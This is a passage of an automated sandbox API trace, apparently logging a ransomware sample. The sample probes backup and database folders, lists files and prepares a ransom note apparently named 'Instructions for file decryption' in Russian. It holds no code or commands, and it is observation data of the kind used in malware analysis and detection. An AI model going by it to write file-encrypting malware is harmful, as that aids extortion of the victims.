lpWideCharStr="firebird\\") returned 9 [0104.051] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=8, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\牡敩s") returned 8 [0104.051] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\MSSQL.1", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, 
ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@巬W企@\x18㤄X\x18D")) returned 0xffffffff [0104.053] GetLastError () returned 0x2 [0104.053] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.053] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=8, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\\x10") returned 8 [0104.053] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=37, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\") returned 37 [0104.053] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@庤W企@\x18儼W\x18j")) returned 0xffffffff [0104.055] GetLastError () returned 0x2 [0104.055] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.055] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=37, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: 
lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\") returned 37 [0104.056] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=6, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\") returned 6 [0104.056] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Adobe", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@鳜W企@\x18㟄X\x18q")) returned 0xffffffff [0104.060] GetLastError () returned 0x2 [0104.061] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.061] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=6, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="adobe\\儸WP") returned 6 [0104.061] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=7, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\") returned 7 [0104.061] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Oracle", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, 
ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@巬W企@\x18㤄X\x18y")) returned 0xffffffff [0104.063] GetLastError () returned 0x2 [0104.063] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=7, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="oracle\\X\x10") returned 7 [0104.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=7, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\") returned 7 [0104.064] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Archive", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@鳜W企@\x18㟄X\x18\x81")) returned 0xffffffff [0104.065] GetLastError () returned 0x2 [0104.066] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=7, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="archiveX\x10") returned 7 
[0104.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=6, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\") returned 6 [0104.066] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Backup", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@巬W企@\x18㤄X\x18\x88")) returned 0xffffffff [0104.068] GetLastError () returned 0x2 [0104.068] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.068] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=6, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="backup㟀X\x10") returned 6 [0104.069] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=6, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\") returned 6 [0104.069] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Reserv", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, 
dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@鳜W企@\x18㟄X\x18\x8f")) returned 0xffffffff [0104.071] GetLastError () returned 0x2 [0104.072] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.072] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=6, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="reserv㤀X\x10") returned 6 [0104.072] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=7, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\") returned 7 [0104.072] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Restore", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@巬W企@\x18㤄X\x18\x97")) returned 0xffffffff [0104.076] GetLastError () returned 0x2 [0104.076] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.076] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=7, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="restoreX\x10") returned 7 [0104.076] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: 
lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.076] SHGetMalloc (in: ppMalloc=0x18f118 | out: ppMalloc=0x18f118*=0x767666bc) returned 0x0 [0104.077] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18f114 | out: ppidl=0x18f114) returned 0x0 [0104.077] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.078] SysReAllocStringLen (in: pbstr=0x18f19c*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18f19c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.078] IMalloc:Free (This=0x767666bc, pv=0x578208) [0104.078] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0104.078] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0104.078] GlobalLock (hMem=0x450004) returned 0x588000 [0104.078] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.078] GlobalUnlock (hMem=0x450004) returned 0 [0104.078] GlobalLock (hMem=0x450004) returned 0x588000 [0104.078] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.078] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.078] GlobalUnlock (hMem=0x450004) returned 0 [0104.078] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.078] GlobalUnlock (hMem=0x45000c) returned 0 [0104.079] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*", lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575030 [0104.080] FindNextFileW 
(in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.080] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0104.080] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab6f770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x8b840, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceca35.dll", cAlternateFileName="SQLCEC~1.DLL")) returned 1 [0104.080] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f114 | out: lpLocalFileTime=0x18f114) returned 1 [0104.080] FileTimeToDosDateTime (in: lpFileTime=0x18f114, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.080] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.080] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.080] GlobalUnlock (hMem=0x45000c) returned 0 [0104.080] GlobalLock 
(hMem=0x45000c) returned 0x588000 [0104.080] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.080] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.080] GlobalUnlock (hMem=0x45000c) returned 0 [0104.080] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.080] GlobalUnlock (hMem=0x450004) returned 0 [0104.080] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.081] CharLowerBuffW (in: lpsz="sqlceca35.dll", cchLength=0xd | out: lpsz="sqlceca35.dll") returned 0xd [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="3ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="añ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18e0b0, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå 
ôàéëîâ.txt\x06") returned 36 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceca35.dll", cchWideChar=72, lpMultiByteStr=0x18e08c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceca35.dllè", lpUsedDefaultChar=0x0) returned 72 [0104.082] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0104.082] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18e0b0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllmpact Edition\\v3.5\\sqlceca35.dllè", lpUsedDefaultChar=0x0) returned 4 [0104.082] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x1d040, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcecompact35.dll", cAlternateFileName="SQLCEC~2.DLL")) returned 1 [0104.082] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.082] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.082] GlobalLock (hMem=0x450004) returned 0x588000 [0104.082] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.082] GlobalUnlock (hMem=0x450004) returned 0 [0104.082] GlobalLock (hMem=0x450004) returned 0x588000 [0104.082] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.082] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.082] GlobalUnlock (hMem=0x450004) 
returned 0 [0104.082] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.082] GlobalUnlock (hMem=0x45000c) returned 0 [0104.082] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.083] CharLowerBuffW (in: lpsz="sqlcecompact35.dll", cchLength=0x12 | out: lpsz="sqlcecompact35.dll") returned 0x12 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18e0a8, 
cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="añ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, 
